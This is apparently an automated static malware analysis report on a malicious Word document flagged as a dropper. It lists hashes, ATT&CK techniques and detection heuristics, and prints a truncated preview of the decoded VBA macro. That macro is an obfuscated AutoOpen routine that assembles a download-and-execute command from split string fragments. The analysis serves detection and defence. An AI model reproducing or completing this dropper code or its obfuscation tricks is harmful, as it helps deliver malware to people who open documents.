Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 32a160f4c672ee9a…

MALICIOUS

Office (OLE)

Size: 494.5 KB
Created: 2018-10-08 13:03:00
Authoring application: Microsoft Office Word
First seen: 2018-11-05
MD5: 800badd867445bd5399c370473de259c
SHA-1: 91a0c442955bb77676fed3b5fd520efa2500a1be
SHA-256: 32a160f4c672ee9aaaf2e65c154114db785d9dc2baba62219e424fad49f39160
Risk score: 370

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1059 Command and Scripting Interpreter

This Office document contains a VBA macro with an AutoOpen function, a common technique for executing code as soon as the document is opened. The macro reassembles the string 'scripting.filesystemobject' from split literals and makes a Shell() call, indicating an intent to interact with the file system and execute commands. Together these strongly suggest the document is a dropper designed to download and execute a second-stage payload.

Heuristics 11

  • ClamAV: Doc.Dropper.Agent-7154332-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7154332-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATION
    VBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All nine URLs below were found in document text (OLE body). They are XML namespace identifiers (RDF, XMP, Dublin Core, DrawingML) of the kind carried by embedded image and Office metadata, not payload-delivery URLs.
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://ns.adobe.com/xap/1.0/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/photoshop/1.0/
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/tiff/1.0/
    • http://ns.adobe.com/exif/1.0/
    • http://schemas.openxmlformats.org/drawingml/2006/main

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 279867 bytes
SHA-256: 07c72cf2a60aa4b72e009aa661c5f0effac49bd0567fb65a7e45cb30b784cfce
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "NewMacros"
Function wefwef()
wefiwef = wefwihefj
wiguowef = "fweweIUF"
End Function
Public Function eeewewewie()
MsgBox "lol"
End Function
Sub AutoOpen()
Const auutgd = False
Const pue_uofn = False
Const zjkcey = False
Const ue_pmeo = False
Const oeiui = True
Const agdiunv = False
Const tdwcorm = False
Const iuuhw = False
Const ygvcbqpxc = True

Select Case 42 - 70
Case -28
iuoh = "$yyyywiayoraaeuufio_pkdtuicxco"
Case bexsagnj_ik
Const txtvny = True
Const owmtojk = False
Const yops_qsoa = False
End Select
Select Case 13 - 78
Case -65
bay_eyfokh = iuoh
Const oe_yobj = False
bay_eyfokh = bay_eyfokh + "_hve='m 465;if';$oaj"
Case 13069
Const bjiofke0 = True
End Select
Const qkyc_i_ku = True

Select Case "vweea2"
Case "vweea2"
biukeitwht = yqsfva + bay_eyfokh + ghhioyoi
kloe = "xnpelow_"
Const owctmbw = True
Const e_jhyaia = True
biukeitwht = biukeitwht + kloe + iioaa_ogu
End Select
Const ti_uybi54 = False

If 54 * 86 = 9819 Then
Const ud_uoe = True
Const spyukno = True
Const yzdrktymx = True
Const xpksi = True
ElseIf 5207 >= 1483 Then
ogwafmdt = biukeitwht
Const mbibrdji = True
Const mlqlmcaxt2 = False
Const fjvppo = False
o_zkaa = "eiixidfokcgjsk"
ogwafmdt = ogwafmdt + o_zkaa
Else
Const ik_euojl = False
Const kkdgxfat_cb = True
Const rfjmfe_o = True
Const atxarh = False
Const gwhpex = True
End If
Const rg_mi50 = True

Select Case "ywmyppzgvte_a"
Case "ywmyppzgvte_a"
fajm_eabqe = "e_vqdkio"
ogwafmdt = ogwafmdt + fajm_eabqe
End Select
Select Case "yuaiecwrvu"
Case "yuaiecwrvu"
ieqb = "ar_ir='//s'"
Const qgualry = True
ogwafmdt = ogwafmdt + ieqb
End Select
Select Case "bmghabpfx"
Case iyywv
Const azdibmy = True
Const rpotxi = False
Const ychxdxkpa = True
Case "bmghabpfx"
gbryem = ogwafmdt
vjvzgcvgcg_ni = ";$pksueau_oi_aqyhci_uyg='ntz''"
gbryem = yui_woe + gbryem + vjvzgcvgcg_ni
End Select
Const ffseht = True

Select Case 38 + 86
Case 124
aeud = ")';$dpimoqli_xbyzku='while(1';$teupytxdss"
gbryem = thmuufhh + gbryem + aeud + ueccghdtt
Case tfleiust
Const uyvlapv = False
Const eybuau00 = True
Const uupai = False
End Select
Select Case "uvzgsdkahrqq"
Case "uvzgsdkahrqq"
a_iid = xfeokcqoi + gbryem
Const eydjht = True
aiojtawd = "rfitzzpjzaujthv"
Const ivavp = True
a_iid = noybmuyq_a + a_iid + aiojtawd + czmtga
End Select
Select Case 52 - 15
Case 37
a_iid = a_iid + "hsh='ient).Do';$eulv_ehtxnhgiislpwusnunzrictb"
Case i_ail
Const uhayyy = True
Const veogz = True
Case 9583
Const oagd = True
Const eu_ou = True
End Select
Select Case "yomkhdalt"
Case "yomkhdalt"
wgelh_mn = "zdswdwj_"
a_iid = a_iid + wgelh_mn
End Select
Select Case "umvshuebcg"
Case 30578
Const utjogu = False
Const lxfczmi = True
Const wofpacxm0 = False
Case ufafkvl
Const icrqqu = True
Const sdkie = False
Const ouxhy = True
Case "umvshuebcg"
oqmiriai = tf_ktaavsai + a_iid
Const xhhhicdl = True
ourslk = "yi21='UF';$uiswlvu_v"
oqmiriai = oqmiriai + ourslk
End Select
Const gw_xdoa = False

Select Case "r_opeqy"
Case "r_opeqy"
yzgfcezdtfii = oqmiriai + ranncvvubw
Const zhnjcree = True
ygjyoyg = "kixduqwlnavnayxue='h , ''f1''"
yzgfcezdtfii = yzgfcezdtfii + ygjyoyg
Case ghzusxn
Const auryua = True
Const oxhyou = True
End Select
Const wns_eaa = False

Select Case 40 * 98
Case 23958
Const aiouaa = False
Const uhapj = True
Case 3920
ii_illw = yzgfcezdtfii
Const fitqnoi = False
Const ehadldte = True
bcoimcn_ese = "';$y_oyuyjgiy"
Const lbdii = False
ii_illw = ddpc_rcmrc + ii_illw + bcoimcn_ese
End Select
Const lhmjji = True

Select Case "ftheiyuua"
Case "ftheiyuua"
eadtgp_ea = "hcp='bjy"
Const lojsmlc = True
ii_illw = ii_illw + eadtgp_ea
End Select
Const twniu = False
Const worgnin = True

If 71 - 19 = 52 The
... (truncated)